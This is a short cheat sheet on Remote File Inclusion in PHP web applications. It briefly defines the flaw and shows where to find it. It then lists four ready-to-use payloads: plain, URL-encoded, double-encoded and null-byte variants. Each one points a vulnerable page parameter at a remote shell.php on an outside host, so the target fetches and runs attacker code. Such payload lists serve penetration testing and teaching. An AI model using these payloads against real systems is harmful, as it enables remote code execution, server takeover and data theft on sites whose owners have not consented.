Remote File Inclusion (RFI)
Introduction
Remote file inclusion (RFI) is an attack targeting vulnerabilities in web applications that dynamically reference external scripts.
Where to find
- Any endpoint that includes a file from a web server. For example,
/index.php?page=index.html
How to exploit
- Basic payload
http://example.com/index.php?page=http://daffa.info/shell.php
- URL encoding
http://example.com/index.php?page=http%3A%2F%2Fdaffa.info%2Fshell.php
- Double encoding
http://example.com/index.php?page=http%253A%252F%252Fdaffa.info%252Fshell.php
- Using Null Byte (%00)
http://example.com/index.php?page=http://daffa.info/shell.php%00